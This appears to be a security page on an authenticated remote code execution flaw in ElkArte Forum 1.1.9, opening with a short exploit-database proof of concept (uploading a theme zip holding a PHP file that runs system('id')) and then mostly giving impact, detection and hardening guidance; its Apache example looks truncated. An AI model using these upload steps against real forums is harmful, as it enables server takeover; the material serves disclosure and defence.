ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)

Exploit Author: tmrswrr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-05-31 
# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) 
# Date: 2024-5-24
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.elkarte.net/
# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip
# Version : 1.1.9


1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m
2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>
3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php
Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)


ElkArte Forum 1.1.9 — Authenticated Remote Code Execution (RCE): Overview, Impact, and Mitigation

This article summarizes the security issue discovered in ElkArte Forum 1.1.9 that permits remote code execution when a user with theme-install privileges can place executable content into a web-accessible theme directory. It explains the root cause at a high level, the likely impact, safe detection techniques, and practical mitigations and hardening steps for administrators and developers.

Summary of the vulnerability (high level)

  • Type: Authenticated Remote Code Execution (RCE) via insecure theme upload/installation.
  • Prerequisites: A valid user account with permission to upload or install themes (typically an administrator or similar privileged role).
  • Root cause (summary): Theme installation functionality accepts archive contents that can include executable server-side files and places them into a web-accessible location without sufficient validation or server-side protections, allowing an attacker to execute arbitrary code via the web server.
  • Impact: Full compromise of the web application process account, potential lateral movement on the host, data theft, backdoors/web shells, and persistent compromise.

Why this is dangerous

Any web application functionality that accepts user-supplied archives and writes files into the document root must carefully validate contents and assume that uploaded files may be malicious. If executable code (PHP, for instance) ends up in a location that the web application server will execute, an attacker can run arbitrary commands with the webserver’s privileges. Even when exploitation requires authentication, such issues remain critical because administrative accounts may be compromised via phishing, reuse, or weak passwords.

Indicators of compromise (IoCs) and detection guidance

  • New or unexpected files in theme directories (especially with .php, .phtml, .phar, or other executable extensions).
  • Unusual HTTP requests to theme files resulting in abnormal responses (e.g., POST/GET to files recently added).
  • Web server error or access logs showing uploads or ZIP extraction operations initiated from the admin/theme install interface.
  • Processes spawned by the web server user, unexpected outbound connections, or scheduled tasks added by the webserver account.
  • Elevated privileges or unusual file permission changes under the webroot.

Immediate remediation steps (incident response)

  • Disable web-accessible theme installation or unpublish the site until the incident is contained.
  • Identify and remove any unexpected files from theme directories. Do this on an isolated host or clean staging environment first and keep forensic copies.
  • Rotate all admin credentials and any credentials for accounts that could have been used to upload content.
  • Check server logs for installation/upload events and timeline of suspicious activity and preserve logs for forensic analysis.
  • If compromise is confirmed, consider rebuilding the affected host from known-good images/backups after investigation, because web-shells often leave backdoors.

Recommended long-term mitigations and hardening

Apply multiple defensive layers — fix the application, harden the webserver, and improve operational posture.

  • Upgrade ElkArte: Install the vendor-supplied patch or upgrade to a version that addresses the issue (check ElkArte’s releases and advisories). Upgrading remains the primary fix.
  • Input validation: Ensure server-side validation rejects archives and filenames that contain executable extensions. Never rely solely on client-side checks.
  • Server-side execution prevention: Configure the webserver to never execute PHP (or other server-side code) from directories intended to hold user-supplied or theme assets.
  • Least privilege: Run the webserver and PHP-FPM processes with the minimum privileges required. Files created by uploads should be owned by a restrictive user/group and have safe permissions.
  • Content-type and extension policy: Only allow expected asset types for themes (images, CSS, JS, templating files if safe) and explicitly block executable types.
  • Monitoring: Add file integrity checks and alerting for new executable files appearing under the webroot.

Safe configuration examples (defensive)

Below are defensively oriented configuration examples you can use immediately to reduce risk. These examples prevent PHP execution in theme directories and validate uploaded archives on the server side. They are intended for system administrators and developers as mitigations while you apply official patches.

Apache — disable PHP execution in the themes directory

# Place this .htaccess inside your themes directory (or configure in your virtual host)

  Require all denied

Explanation: This directive tells Apache to deny access to files matching common PHP-related extensions. In Apache 2.2 you would use “Order allow,deny” style directives; in modern Apache (2.4+) the “Require all denied” form is preferred. This prevents the webserver from serving/executing PHP files that may have been uploaded into the themes directory.

Nginx + PHP-FPM — deny PHP processing in the themes path

# Example server block snippet
location ~* ^/themes/.*\.(php|phtml|phar|php[0-9]+)$ {
    return 404;
}
# Ensure php processing only occurs in intended paths
location ~ \.php$ {
    include fastcgi_params;
    fastcgi_pass unix:/run/php/php-fpm.sock;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}

Explanation: The first location rule returns a 404 for requests for PHP-like files inside the themes directory, preventing Nginx from forwarding them to PHP-FPM. The second block handles legitimate PHP processing elsewhere. Adjust $document_root and socket paths to your environment.

Server-side ZIP validation (defensive PHP example)

<?php
// Defensive pseudocode for validating a ZIP before extraction
$zip = new ZipArchive();
if ($zip->open($uploadedFile) === TRUE) {
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $stat = $zip->statIndex($i);
        $name = $stat['name'];
        // Reject entries with directory traversal or executable extensions
        if (strpos($name, '..') !== false || preg_match('/\.(php|phtml|phar|exe|sh|pl|py)$/i', $name)) {
            $zip->close();
            throw new Exception('Archive contains disallowed files.');
        }
    }
    // proceed to extract into a safe tmp dir, then whitelist-approve files before moving
    $zip->extractTo($safeTmpDir);
    $zip->close();
}
?>

Explanation: This code demonstrates a defensive approach: before extracting an uploaded archive, iterate through entries and reject files with dangerous extensions or path traversal sequences. Extraction should be done to a non-web-accessible temporary directory, and only files that pass an approved whitelist of types should be moved into web-accessible directories.

Filesystem permissions and process isolation

  • Set directories to 0755 and files to 0644 where appropriate. Avoid giving upload directories execute permission.
  • Ensure the webserver user cannot modify critical configuration files. Chroot or containerize the web application where practical.
  • Use OS-level Mandatory Access Controls (SELinux, AppArmor) to prevent the web process from writing or executing in unexpected paths.

Operational best practices

  • Limit the number of users with theme install or site-administration privileges.
  • Use multi-factor authentication (MFA) for administrative accounts.
  • Keep the application, OS, and webserver packages up to date and subscribe to vendor security advisories.
  • Perform regular security reviews and penetration tests of admin-facing functionality.
  • Enable centralized logging and file integrity monitoring (FIM) for the webroot.

Detection queries and monitoring suggestions

  • Search web server access logs for POSTs to theme install endpoints or archive upload endpoints.
  • Monitor for recently modified or newly created .php files under theme directories: find /var/www/html/your-site/themes -type f -iname "*.php" -mtime -7
  • Use IDS rules to alert on requests for odd endpoints under /themes/ or requests for files that should not normally be requested.

Reporting and responsible disclosure

If you are a security researcher or administrator who discovered this issue in your environment, report it to ElkArte through their official channels and follow responsible disclosure practices. Provide vendor support with sufficient details to reproduce and test a fix, but avoid posting exploit steps in public forums that could enable abuse before a patch is available.

Conclusion

The core takeaway: accept archives only after strict server-side validation, prevent execution of user-supplied content in web-accessible locations, and operate with least privilege. Combined fixes at the application and server level quickly reduce the attack surface and mitigate the risk of authenticated theme-upload RCE issues.